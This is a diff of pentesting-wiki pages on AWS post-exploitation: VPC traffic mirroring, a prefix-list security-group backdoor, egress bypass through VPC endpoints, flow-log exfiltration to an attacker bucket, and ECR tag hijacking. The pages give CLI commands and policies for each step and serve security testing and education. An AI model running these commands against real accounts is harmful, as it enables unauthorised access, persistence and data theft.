 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md
@@ -1,19 +1,23 @@
 # AWS - Malicious VPC Mirror
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 **Check** [**https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws**](https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws) **for further details of the attack!**
 
-Passive network inspection in a cloud environment has been **challenging**, requiring major configuration changes to monitor network traffic. However, a new feature called “**VPC Traffic Mirroring**” has been introduced by AWS to simplify this process. With VPC Traffic Mirroring, network traffic within VPCs can be **duplicated** without installing any software on the instances themselves. This duplicated traffic can be sent to a network intrusion detection system (IDS) for **analysis**.
+Passive network inspection in a cloud environment can require broad network changes to monitor hosts without making monitoring noisy or easy to bypass. AWS VPC Traffic Mirroring copies inbound and outbound traffic from an instance network interface without an agent and can deliver matching packets to a security or monitoring appliance such as an IDS for analysis.<sup>[[1]](#references)[[7]](#references)</sup>
 
-To address the need for **automated deployment** of the necessary infrastructure for mirroring and exfiltrating VPC traffic, we have developed a proof-of-concept script called “**malmirror**”. This script can be used with **compromised AWS credentials** to set up mirroring for all supported EC2 instances in a target VPC. It is important to note that VPC Traffic Mirroring is only supported by EC2 instances powered by the AWS Nitro system, and the VPC mirror target must be within the same VPC as the mirrored hosts.
+To automate malicious deployment, Rhino Security Labs published the proof-of-concept **malmirror** script. It uses AWS credentials to enumerate EC2 instances, create an EC2 mirror target and an all-traffic filter, and create mirror sessions for matching instances in a selected VPC.<sup>[[4]](#references)[[5]](#references)[[7]](#references)</sup> The target instance captures mirrored packets into PCAP files and uploads completed files to the supplied S3 bucket, providing the PoC's exfiltration path.<sup>[[5]](#references)[[6]](#references)</sup> The original PoC only creates sessions for matching instances in the selected VPC; current AWS Traffic Mirroring also supports a source and target in connected VPCs when intra-Region peering, a transit gateway, or a Gateway Load Balancer endpoint and suitable routing are available.<sup>[[2]](#references)[[3]](#references)[[5]](#references)</sup>
 
-The **impact** of malicious VPC traffic mirroring can be significant, as it allows attackers to access **sensitive information** transmitted within VPCs. The **likelihood** of such malicious mirroring is high, considering the presence of **cleartext traffic** flowing through VPCs. Many companies use cleartext protocols within their internal networks for **performance reasons**, assuming traditional man-in-the-middle attacks are not possible.
+Malicious mirroring can expose **sensitive information** in transit, particularly where a VPC carries **cleartext traffic**. Rhino assessed the likelihood as high in such environments and noted that teams may use cleartext internal protocols because of TLS performance overhead and the assumption that traditional man-in-the-middle or ARP-spoofing attacks are not practical; the actual exposure remains environment-dependent.<sup>[[7]](#references)</sup>
 
-For more information and access to the [**malmirror script**](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror), it can be found on our **GitHub repository**. The script automates and streamlines the process, making it **quick, simple, and repeatable** for offensive research purposes.
+For more information and access to the [**malmirror script**](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror), see the **GitHub repository**. The script was designed to make the workflow **quick, simple, and repeatable** for offensive research purposes.<sup>[[4]](#references)[[7]](#references)</sup>
+
+## References
+
+- [1] [What is Traffic Mirroring? - Amazon Virtual Private Cloud](https://docs.aws.amazon.com/vpc/latest/mirroring/what-is-traffic-mirroring.html)
+- [2] [How Traffic Mirroring works - Amazon Virtual Private Cloud](https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html)
+- [3] [Understand traffic mirror source and target connectivity options - Amazon Virtual Private Cloud](https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-connection.html)
+- [4] [malmirror source repository](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror)
+- [5] [deploy-malmirror.py](https://raw.githubusercontent.com/RhinoSecurityLabs/Cloud-Security-Research/master/AWS/malmirror/deploy-malmirror.py)
+- [6] [sniff.py](https://raw.githubusercontent.com/RhinoSecurityLabs/Cloud-Security-Research/master/AWS/malmirror/sniff.py)
+- [7] [Abusing VPC Traffic Mirroring in AWS - Rhino Security Labs](https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-managed-prefix-list-backdoor.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-managed-prefix-list-backdoor.md
@@ -1,29 +1,30 @@
 # AWS - Security Group Backdoor via Managed Prefix Lists
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Summary
-Abuse customer-managed Prefix Lists to create a stealthy access path. If a security group (SG) rule references a managed Prefix List, anyone with the ability to modify that list can silently add attacker-controlled CIDRs. Every SG (and potentially Network ACL or VPC endpoint) that references the list immediately allows the new ranges without any visible SG change.
+Customer-managed prefix lists are reusable sets of CIDR blocks that security-group rules can reference. When entries change, AWS creates a new version and resources that reference the list use the latest version. An identity that can modify the list can therefore add an attacker-controlled CIDR and widen every referencing security group without changing its rule.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ## Impact
-- Instant expansion of allowed IP ranges for all SGs referencing the prefix list, bypassing change controls that only monitor SG edits.
-- Enables persistent ingress/egress backdoors: keep the malicious CIDR hidden in the prefix list while the SG rule appears unchanged.
+- Expands the ingress or egress allowed by every referencing SG while the SG rule continues to reference the same prefix-list ID.<sup>[[1]](#references)[[2]](#references)</sup>
+- Creates a persistent access path if the malicious CIDR remains in the list; monitoring that only audits SG rule changes can miss the prefix-list update.
 
 ## Requirements
 - IAM permissions:
-  - `ec2:DescribeManagedPrefixLists`
-  - `ec2:GetManagedPrefixListEntries`
-  - `ec2:ModifyManagedPrefixList`
-  - `ec2:DescribeSecurityGroups` / `ec2:DescribeSecurityGroupRules` (to identify attached SGs)
-- Optional: `ec2:CreateManagedPrefixList` if creating a new one for testing.
-- Environment: At least one SG rule referencing the target customer-managed Prefix List.
+  - `ec2:DescribeManagedPrefixLists`<sup>[[1]](#references)</sup>
+  - `ec2:GetManagedPrefixListEntries`<sup>[[1]](#references)</sup>
+  - `ec2:GetManagedPrefixListAssociations`<sup>[[3]](#references)</sup>
+  - `ec2:ModifyManagedPrefixList`<sup>[[1]](#references)</sup>
+  - `ec2:DescribeSecurityGroups` (alternative SG inventory path).<sup>[[9]](#references)</sup>
+  - `ec2:DescribeSecurityGroupRules` (to inspect SG rules that reference the list).<sup>[[4]](#references)</sup>
+- Optional: `ec2:CreateManagedPrefixList` if creating a new one for testing.<sup>[[5]](#references)</sup>
+- Environment: At least one SG rule referencing the target customer-managed prefix list.<sup>[[2]](#references)</sup>
 
 ## Variables
 
 ```bash
 REGION=us-east-1
-PREFIX_LIST_ID=<pl-xxxxxxxx>
-ENTRY_CIDR=<attacker-cidr/32>
+VICTIM_ACCOUNT_ID="<victim-account-id>"
+PREFIX_LIST_ID="<pl-xxxxxxxx>"
+ENTRY_CIDR="<attacker-cidr/32>"
 DESCRIPTION="Backdoor – allow attacker"
 ```
 
@@ -34,7 +35,8 @@ DESCRIPTION="Backdoor – allow attacker"
 ```bash
 aws ec2 describe-managed-prefix-lists \
   --region "$REGION" \
-  --query 'PrefixLists[?OwnerId==`<victim-account-id>`].[PrefixListId,PrefixListName,State,MaxEntries]' \
+  --filters "Name=owner-id,Values=$VICTIM_ACCOUNT_ID" \
+  --query 'PrefixLists[*].[PrefixListId,PrefixListName,State,MaxEntries]' \
   --output table
 
 aws ec2 get-managed-prefix-list-entries \
@@ -43,7 +45,24 @@ aws ec2 get-managed-prefix-list-entries \
   --query 'Entries[*].[Cidr,Description]'
 ```
 
-Use `aws ec2 describe-security-group-rules --filters Name=referenced-prefix-list-id,Values=$PREFIX_LIST_ID` to confirm which SG rules rely on the list.
+The commands above use the documented owner filter and list-entry fields.<sup>[[6]](#references)[[7]](#references)</sup>
+
+```bash
+aws ec2 get-managed-prefix-list-associations \
+  --prefix-list-id "$PREFIX_LIST_ID" \
+  --region "$REGION" \
+  --query 'PrefixListAssociations[*].[ResourceId,ResourceOwner]' \
+  --output table
+```
+
+Use the association output to identify resources that consume the list. In the current account, inspect the associated SG rules by filtering the returned `PrefixListId` field locally:<sup>[[3]](#references)[[4]](#references)</sup>
+
+```bash
+aws ec2 describe-security-group-rules \
+  --region "$REGION" \
+  --query "SecurityGroupRules[?PrefixListId=='$PREFIX_LIST_ID'].{SG:GroupId,Egress:IsEgress,Description:Description}" \
+  --output table
+```
 
 2) **Add attacker CIDR to the prefix list**
 
@@ -54,21 +73,28 @@ aws ec2 modify-managed-prefix-list \
   --region "$REGION"
 ```
 
+Adding or removing entries creates a new prefix-list version. Pass `--current-version` when concurrent writers must be detected; AWS rejects a stale version.<sup>[[8]](#references)</sup>
+
 3) **Validate propagation to security groups**
 
 ```bash
+aws ec2 describe-managed-prefix-lists \
+  --region "$REGION" \
+  --prefix-list-ids "$PREFIX_LIST_ID" \
+  --query 'PrefixLists[0].State' \
+  --output text
+
 aws ec2 describe-security-group-rules \
   --region "$REGION" \
-  --filters Name=referenced-prefix-list-id,Values="$PREFIX_LIST_ID" \
-  --query 'SecurityGroupRules[*].{SG:GroupId,Description:Description}' \
+  --query "SecurityGroupRules[?PrefixListId=='$PREFIX_LIST_ID'].{SG:GroupId,Egress:IsEgress,Description:Description}" \
   --output table
 ```
 
-Traffic from `$ENTRY_CIDR` is now allowed wherever the prefix list is referenced (commonly outbound rules on egress proxies or inbound rules on shared services).
+Wait for the prefix list to report `modify-complete` before testing traffic. If the rule's direction, protocol, and routing permit it, traffic from `$ENTRY_CIDR` is then allowed by the referencing SG rules; prefix lists can be sources for inbound rules or destinations for outbound rules.<sup>[[2]](#references)[[6]](#references)[[8]](#references)</sup>
 
 ## Evidence
-- `get-managed-prefix-list-entries` reflects the attacker CIDR and description.
-- `describe-security-group-rules` still shows the original SG rule referencing the prefix list (no SG modification recorded), yet traffic from the new CIDR succeeds.
+- `get-managed-prefix-list-entries` reflects the attacker CIDR and description.<sup>[[7]](#references)</sup>
+- `describe-security-group-rules` still returns the original rule's `PrefixListId`; changing the list version does not require changing the SG rule. A connectivity test then confirms effective access from the new CIDR.<sup>[[1]](#references)[[4]](#references)</sup>
 
 ## Cleanup
 
@@ -78,5 +104,19 @@ aws ec2 modify-managed-prefix-list \
   --remove-entries Cidr="$ENTRY_CIDR" \
   --region "$REGION"
 ```
+
+Removing the entry creates another prefix-list version; wait for `modify-complete` and repeat the entry and connectivity checks.<sup>[[6]](#references)[[7]](#references)[[8]](#references)</sup>
+
+## References
+
+- [1] [Consolidate and manage network CIDR blocks with managed prefix lists](https://docs.aws.amazon.com/vpc/latest/userguide/managed-prefix-lists.html)
+- [2] [Optimize AWS infrastructure management with prefix lists](https://docs.aws.amazon.com/vpc/latest/userguide/managed-prefix-lists-referencing.html)
+- [3] [get-managed-prefix-list-associations](https://docs.aws.amazon.com/cli/latest/reference/ec2/get-managed-prefix-list-associations.html)
+- [4] [describe-security-group-rules](https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-security-group-rules.html)
+- [5] [create-managed-prefix-list](https://docs.aws.amazon.com/cli/latest/reference/ec2/create-managed-prefix-list.html)
+- [6] [describe-managed-prefix-lists](https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-managed-prefix-lists.html)
+- [7] [get-managed-prefix-list-entries](https://docs.aws.amazon.com/cli/latest/reference/ec2/get-managed-prefix-list-entries.html)
+- [8] [modify-managed-prefix-list](https://docs.aws.amazon.com/cli/latest/reference/ec2/modify-managed-prefix-list.html)
+- [9] [describe-security-groups](https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-security-groups.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-vpc-endpoint-egress-bypass.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-vpc-endpoint-egress-bypass.md
@@ -1,43 +1,49 @@
 # AWS – Egress Bypass from Isolated Subnets via VPC Endpoints
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Summary
 
-This technique abuses VPC Endpoints to create exfiltration channels from subnets without Internet Gateways or NAT. Gateway endpoints (e.g., S3) add prefix‑list routes into the subnet route tables; Interface endpoints (e.g., execute-api, secretsmanager, ssm, etc.) create reachable ENIs with private IPs protected by security groups. With minimal VPC/EC2 permissions, an attacker can enable controlled egress that doesn’t traverse the public Internet.
+This technique abuses VPC endpoints to create service-specific paths from subnets without Internet Gateways or NAT. Gateway endpoints (for example, S3) add prefix-list routes to selected route tables; interface endpoints (for example, `execute-api`, `secretsmanager`, `ssm`, and `sts`) create requester-managed network interfaces with private IPs protected by security groups. Interface endpoint connections stay on the AWS network, and both endpoint types reach only the selected service rather than providing arbitrary Internet access.<sup>[[1]](#references)[[2]](#references)[[7]](#references)</sup>
 
-> Prereqs: existing VPC and private subnets (no IGW/NAT). You’ll need permissions to create VPC endpoints and, for Option B, a security group to attach to the endpoint ENIs.
+> Prereqs: existing VPC and private subnets (no IGW/NAT). The operator needs permission to create the endpoint and use the selected VPC, route table, subnet, and security-group resources; for Option B, the endpoint ENI security group must allow HTTPS from the target instances. Endpoint, identity, bucket, and API resource policies still control the resulting service access.<sup>[[3]](#references)[[4]](#references)[[8]](#references)</sup>
 
 ## Option A – S3 Gateway VPC Endpoint
 
 **Variables**
 - `REGION=us-east-1`
 - `VPC_ID=<target vpc>`
-- `RTB_IDS=<comma-separated route table IDs of private subnets>`
+- `RTB_IDS=("rtb-<private-subnet-route-table-1>" "rtb-<private-subnet-route-table-2>")`
 
-1) Create a permissive endpoint policy file (optional). Save as `allow-put-get-any-s3.json`:
+1) Create a permissive endpoint policy file (optional). Endpoint policies are resource-based policies and must include a `Principal`; gateway endpoint policies use `"*"`. Save as `allow-put-get-any-s3.json`:<sup>[[3]](#references)</sup>
 
 ```json
 {
   "Version": "2012-10-17",
-  "Statement": [ { "Effect": "Allow", "Action": ["s3:*"], "Resource": ["*"] } ]
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Principal": "*",
+      "Action": ["s3:*"],
+      "Resource": ["*"]
+    }
+  ]
 }
 ```
 
-2) Create the S3 Gateway endpoint (adds S3 prefix‑list route to the selected route tables):
+2) Create the S3 Gateway endpoint (it adds an S3 prefix-list route to each selected route table):<sup>[[2]](#references)[[4]](#references)</sup>
 
 ```bash
 aws ec2 create-vpc-endpoint \
-  --vpc-id $VPC_ID \
-  --service-name com.amazonaws.$REGION.s3 \
+  --vpc-id "$VPC_ID" \
+  --service-name "com.amazonaws.$REGION.s3" \
   --vpc-endpoint-type Gateway \
-  --route-table-ids $RTB_IDS \
-  --policy-document file://allow-put-get-any-s3.json   # optional
+  --route-table-ids "${RTB_IDS[@]}" \
+  --policy-document file://allow-put-get-any-s3.json \
+  --region "$REGION" # optional: omit this line and the policy-document line for defaults
 ```
 
 Evidence to capture:
-- `aws ec2 describe-route-tables --route-table-ids $RTB_IDS` shows a route to the AWS S3 prefix list (e.g., `DestinationPrefixListId=pl-..., GatewayId=vpce-...`).
-- From an instance in those subnets (with IAM perms) you can exfil via S3 without Internet:
+- `aws ec2 describe-route-tables --route-table-ids "${RTB_IDS[@]}" --region "$REGION"` shows an active route to the regional S3 prefix list (for example, `DestinationPrefixListId=pl-...` and `GatewayId=vpce-...`).<sup>[[2]](#references)[[9]](#references)</sup>
+- From an instance in those subnets, a caller whose IAM identity, endpoint policy, and destination bucket policy permit the write can exfiltrate via S3 without an Internet Gateway or NAT. Use a bucket in the endpoint’s Region because gateway endpoints are regional.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ```bash
 # On the isolated instance (e.g., via SSM):
@@ -47,30 +53,46 @@ aws s3 cp /tmp/x.txt s3://<your-bucket>/egress-test/x.txt --region $REGION
 
 ## Option B – Interface VPC Endpoint for API Gateway (execute-api)
 
+An interface endpoint for API Gateway places a requester-managed network interface with a private IP in each selected subnet. The AWS service name for this endpoint is `com.amazonaws.<region>.execute-api`.<sup>[[7]](#references)[[8]](#references)</sup>
+
 **Variables**
 - `REGION=us-east-1`
 - `VPC_ID=<target vpc>`
-- `SUBNET_IDS=<comma-separated private subnets>`
+- `SUBNET_IDS=("subnet-<private-subnet-1>" "subnet-<private-subnet-2>")`
 - `SG_VPCE=<security group for the endpoint ENIs allowing 443 from target instances>`
 
-1) Create the interface endpoint and attach the SG:
+1) Create the interface endpoint and attach the security group. Its inbound rules must allow TCP/443 from the target instances; private DNS also requires VPC DNS hostnames and DNS resolution to be enabled.<sup>[[4]](#references)[[8]](#references)</sup>
 
 ```bash
 aws ec2 create-vpc-endpoint \
-  --vpc-id $VPC_ID \
-  --service-name com.amazonaws.$REGION.execute-api \
+  --vpc-id "$VPC_ID" \
+  --service-name "com.amazonaws.$REGION.execute-api" \
   --vpc-endpoint-type Interface \
-  --subnet-ids $SUBNET_IDS \
-  --security-group-ids $SG_VPCE \
-  --private-dns-enabled
+  --subnet-ids "${SUBNET_IDS[@]}" \
+  --security-group-ids "$SG_VPCE" \
+  --private-dns-enabled \
+  --region "$REGION"
 ```
 
 Evidence to capture:
-- `aws ec2 describe-vpc-endpoints` shows the endpoint in `available` state with `NetworkInterfaceIds` (ENIs in your subnets).
-- Instances in those subnets can reach Private API Gateway endpoints through those VPCE ENIs (no Internet path required).
+- After the endpoint reaches `available`, `aws ec2 describe-vpc-endpoints --region "$REGION"` shows its `NetworkInterfaceIds` (ENIs in the selected subnets), associated security groups, and endpoint state.<sup>[[4]](#references)[[10]](#references)</sup>
+- Instances in those subnets can reach a private API Gateway REST API through the VPCE ENIs without an Internet path only when the API is associated with the endpoint and its API and endpoint policies allow the request. Private DNS makes the standard API hostname resolve to the endpoint, but it also prevents access to public API default endpoints from that VPC.<sup>[[5]](#references)[[6]](#references)</sup>
 
 ## Impact
-- Bypasses perimeter egress controls by leveraging AWS‑managed private paths to AWS services.
-- Enables data exfiltration from isolated subnets (e.g., writing to S3; calling Private API Gateway; reaching Secrets Manager/SSM/STS, etc.) without IGW/NAT.
+- Bypasses egress controls that only block Internet Gateway or NAT paths by leveraging AWS-managed private paths to selected AWS services.<sup>[[1]](#references)[[2]](#references)</sup>
+- Enables data exfiltration from isolated subnets when the relevant identity, endpoint, and service resource policies permit it (for example, writing to S3 or calling a private API Gateway); Secrets Manager, SSM, and STS require their own interface endpoints and authorization.<sup>[[3]](#references)[[5]](#references)[[7]](#references)</sup>
+
+## References
+
+- [1] [AWS PrivateLink concepts](https://docs.aws.amazon.com/vpc/latest/privatelink/concepts.html)
+- [2] [Gateway endpoints for Amazon S3](https://docs.aws.amazon.com/vpc/latest/privatelink/vpc-endpoints-s3.html)
+- [3] [Control access to VPC endpoints using endpoint policies](https://docs.aws.amazon.com/vpc/latest/privatelink/vpc-endpoints-access.html)
+- [4] [create-vpc-endpoint — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ec2/create-vpc-endpoint.html)
+- [5] [Private REST APIs in API Gateway](https://docs.aws.amazon.com/apigateway/latest/developerguide/apigateway-private-apis.html)
+- [6] [Invoke a private API](https://docs.aws.amazon.com/apigateway/latest/developerguide/apigateway-private-api-test-invoke-url.html)
+- [7] [AWS services that integrate with AWS PrivateLink](https://docs.aws.amazon.com/vpc/latest/privatelink/aws-services-privatelink-support.html)
+- [8] [Access an AWS service using an interface VPC endpoint](https://docs.aws.amazon.com/vpc/latest/privatelink/create-interface-endpoint.html)
+- [9] [describe-route-tables — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-route-tables.html)
+- [10] [describe-vpc-endpoints — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-vpc-endpoints.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-vpc-flow-logs-cross-account-exfiltration.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-vpc-flow-logs-cross-account-exfiltration.md
@@ -1,18 +1,15 @@
 # AWS - VPC Flow Logs Cross-Account Exfiltration to S3
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Summary
-Abuse `ec2:CreateFlowLogs` to export VPC, subnet, or ENI flow logs directly to an attacker-controlled S3 bucket. Once the delivery role is configured to write to the external bucket, every connection seen on the monitored resource is streamed out of the victim account.
+An attacker who can create VPC Flow Logs can point the delivery destination at an S3 bucket in another account whose bucket policy permits the log-delivery service to write. VPC Flow Logs capture network-flow metadata for a VPC, subnet, or network interface and deliver it to S3 in batches, making this an ongoing cross-account exfiltration path.<sup>[[1]](#references)[[2]](#references)[[7]](#references)</sup>
 
 ## Requirements
-- Victim principal: `ec2:CreateFlowLogs`, `ec2:DescribeFlowLogs`, and `iam:PassRole` (if a delivery role is required/created).
-- Attacker bucket: S3 policy that trusts `delivery.logs.amazonaws.com` with `s3:PutObject` and `bucket-owner-full-control`.
-- Optional: `logs:DescribeLogGroups` if exporting to CloudWatch instead of S3 (not needed here).
+- Victim principal: `ec2:CreateFlowLogs`; `ec2:DescribeFlowLogs` is useful for checking the created log. S3 publishing also requires `logs:CreateLogDelivery` and `logs:DeleteLogDelivery`. `iam:PassRole` and `--deliver-logs-permission-arn` are for CloudWatch Logs delivery, not this S3 path.<sup>[[3]](#references)[[4]](#references)[[5]](#references)[[8]](#references)</sup>
+- Attacker bucket: a policy allowing `delivery.logs.amazonaws.com` to call `s3:PutObject` under the chosen prefix and `s3:GetBucketAcl`, with `s3:x-amz-acl` set to `bucket-owner-full-control`. Restrict the policy to the victim account and the regional Logs service ARN where possible.<sup>[[1]](#references)[[5]](#references)</sup>
 
 ## Attack Walkthrough
 
-1) **Attacker** prepares an S3 bucket policy (in attacker account) that allows the VPC Flow Logs delivery service to write objects. Replace placeholders before applying:
+1) **Attacker** prepares an S3 bucket policy (in the attacker account) that allows the VPC Flow Logs delivery service to write objects from the victim account. Replace placeholders before applying. The bucket owner must grant these permissions when the flow-log creator does not own the bucket; the `SourceAccount` and `SourceArn` conditions limit the confused-deputy exposure.<sup>[[1]](#references)[[5]](#references)</sup>
 
 ```json
 {
@@ -25,7 +22,28 @@ Abuse `ec2:CreateFlowLogs` to export VPC, subnet, or ENI flow logs directly to a
       "Action": "s3:PutObject",
       "Resource": "arn:aws:s3:::<attacker-bucket>/flowlogs/*",
       "Condition": {
-        "StringEquals": { "s3:x-amz-acl": "bucket-owner-full-control" }
+        "StringEquals": {
+          "aws:SourceAccount": "<victim-account-id>",
+          "s3:x-amz-acl": "bucket-owner-full-control"
+        },
+        "ArnLike": {
+          "aws:SourceArn": "arn:aws:logs:<region>:<victim-account-id>:*"
+        }
+      }
+    },
+    {
+      "Sid": "AllowVPCFlowLogsAclCheck",
+      "Effect": "Allow",
+      "Principal": { "Service": "delivery.logs.amazonaws.com" },
+      "Action": "s3:GetBucketAcl",
+      "Resource": "arn:aws:s3:::<attacker-bucket>",
+      "Condition": {
+        "StringEquals": {
+          "aws:SourceAccount": "<victim-account-id>"
+        },
+        "ArnLike": {
+          "aws:SourceArn": "arn:aws:logs:<region>:<victim-account-id>:*"
+        }
       }
     }
   ]
@@ -40,27 +58,25 @@ aws s3api put-bucket-policy \
   --policy file://flowlogs-policy.json
 ```
 
-2) **Victim** (compromised principal) creates the flow logs targeting the attacker bucket:
+2) **Victim** (compromised principal) creates the flow log targeting the attacker bucket. An S3 destination does not require a delivery IAM role, so omit `--deliver-logs-permission-arn`.<sup>[[3]](#references)[[8]](#references)</sup>
 
 ```bash
 REGION=us-east-1
 VPC_ID=<vpc-xxxxxxxx>
-ROLE_ARN=<delivery-role-with-logs-permissions>   # Must allow delivery.logs.amazonaws.com to assume it
 aws ec2 create-flow-logs \
   --resource-type VPC \
   --resource-ids "$VPC_ID" \
   --traffic-type ALL \
   --log-destination-type s3 \
   --log-destination arn:aws:s3:::<attacker-bucket>/flowlogs/ \
-  --deliver-logs-permission-arn "$ROLE_ARN" \
   --region "$REGION"
 ```
 
-Within minutes, flow log files appear in the attacker bucket containing connections for all ENIs in the monitored VPC/subnet.
+For a VPC or subnet target, the flow log covers each network interface in that resource. Records are aggregated and S3 delivery is typically about 10 minutes after capture, on a best-effort basis; the resulting objects are written below the supplied prefix (for example, under `AWSLogs/<account-id>/vpcflowlogs/<region>/`).<sup>[[2]](#references)[[6]](#references)[[7]](#references)</sup>
 
 ## Evidence
 
-Sample flow log records written to the attacker bucket:
+The following sample uses the default version 2 field order; replace the illustrative values with records collected from the attacker bucket.<sup>[[6]](#references)</sup>
 
 ```text
 version account-id interface-id srcaddr dstaddr srcport dstport protocol packets bytes start end action log-status
@@ -78,7 +94,18 @@ aws s3 ls s3://<attacker-bucket>/flowlogs/ --recursive --human-readable --summar
 ```
 
 ## Impact
-- Continuous network metadata exfiltration (source/destination IPs, ports, protocols) for the monitored VPC/subnet/ENI.
+- Ongoing, batched network metadata exfiltration (source/destination IPs, ports, protocols) for the monitored VPC/subnet/ENI.<sup>[[6]](#references)[[7]](#references)</sup>
 - Enables traffic analysis, identification of sensitive services, and potential hunting for security group misconfigurations from outside the victim account.
+
+## References
+
+- [1] [Configure VPC Flow Logs for centralization across AWS accounts](https://docs.aws.amazon.com/prescriptive-guidance/latest/patterns/configure-vpc-flow-logs-for-centralization-across-aws-accounts.html)
+- [2] [Flow logs basics](https://docs.aws.amazon.com/vpc/latest/userguide/flow-logs-basics.html)
+- [3] [Create a flow log that publishes to Amazon S3](https://docs.aws.amazon.com/vpc/latest/userguide/flow-logs-s3-create-flow-log.html)
+- [4] [Actions, resources, and condition keys for Amazon EC2](https://docs.aws.amazon.com/service-authorization/latest/reference/list_ec2.html)
+- [5] [Amazon S3 bucket permissions for flow logs](https://docs.aws.amazon.com/vpc/latest/userguide/flow-logs-s3-permissions.html)
+- [6] [Flow log records](https://docs.aws.amazon.com/vpc/latest/userguide/flow-log-records.html)
+- [7] [Flow log files](https://docs.aws.amazon.com/vpc/latest/userguide/flow-logs-s3-path.html)
+- [8] [CreateFlowLogs](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_CreateFlowLogs.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation/README.md
@@ -1,16 +1,18 @@
 # AWS - ECR Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## ECR
 
-For more information check
+For more information, see the ECR enumeration page.<sup>[[1]](#references)</sup>
 
 {{#ref}}
 ../../aws-services/aws-ecr-enum.md
 {{#endref}}
 
 ### Login, Pull & Push
+
+ECR authorization tokens are scoped to the IAM principal and valid for 12 hours. Private-registry login uses the `AWS` username, while AWS CLI authentication to ECR Public uses the `us-east-1` Region.<sup>[[2]](#references)[[3]](#references)</sup>
+
+When Docker is unavailable, `BatchGetImage` returns image-manifest data and `GetDownloadUrlForLayer` returns a pre-signed URL for an image layer.<sup>[[5]](#references)[[6]](#references)</sup>
 
 ```bash
 # Docker login into ecr
@@ -49,7 +51,7 @@ aws ecr get-download-url-for-layer \
     --layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a"
 ```
 
-After downloading the images you should **check them for sensitive info**:
+After downloading the images you should **check them for sensitive info**.<sup>[[4]](#references)</sup>
 
 {{#ref}}
 https://book.hacktricks.wiki/en/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.html
@@ -57,9 +59,9 @@ https://book.hacktricks.wiki/en/generic-methodologies-and-resources/basic-forens
 
 ### Overwrite a Trusted Tag via `ecr:PutImage` (Tag Hijacking / Supply Chain)
 
-If consumers deploy by tag (for example `stable`, `prod`, `latest`) and tags are mutable, `ecr:PutImage` can be used to **repoint a trusted tag** to attacker-controlled content by uploading an image manifest under that tag.
+If consumers deploy by tag (for example `stable`, `prod`, `latest`) and tags are mutable, `ecr:PutImage` can be used to **repoint a trusted tag** to attacker-controlled content by uploading an image manifest under that tag. ECR's `PutImage` operation creates or updates the manifest and tags associated with an image.<sup>[[5]](#references)[[7]](#references)[[8]](#references)</sup>
 
-One common approach is to copy the manifest of an existing attacker-controlled tag (or digest) and overwrite the trusted tag with it.
+One common approach is to copy the manifest of an existing attacker-controlled tag (or digest) and overwrite the trusted tag with it.<sup>[[5]](#references)[[7]](#references)</sup>
 
 ```bash
 REGION=us-east-1
@@ -87,13 +89,15 @@ aws ecr describe-images --region "$REGION" --repository-name "$REPO" --image-ids
 aws ecr describe-images --region "$REGION" --repository-name "$REPO" --image-ids imageTag="$SRC_TAG" --query 'imageDetails[0].imageDigest' --output text
 ```
 
-**Impact**: any workload pulling `.../$REPO:$DST_TAG` will receive attacker-selected content without any change to IaC, Kubernetes manifests, or task definitions.
+**Impact**: any workload pulling `.../$REPO:$DST_TAG` can receive attacker-selected content without a change to its deployment configuration.<sup>[[7]](#references)[[8]](#references)</sup>
 
-#### Downstream Consumer Example: Lambda Container Images Auto-Refreshing on Tag Updates
+#### Downstream Consumer Example: Lambda Container Images Re-resolved on Function Updates
 
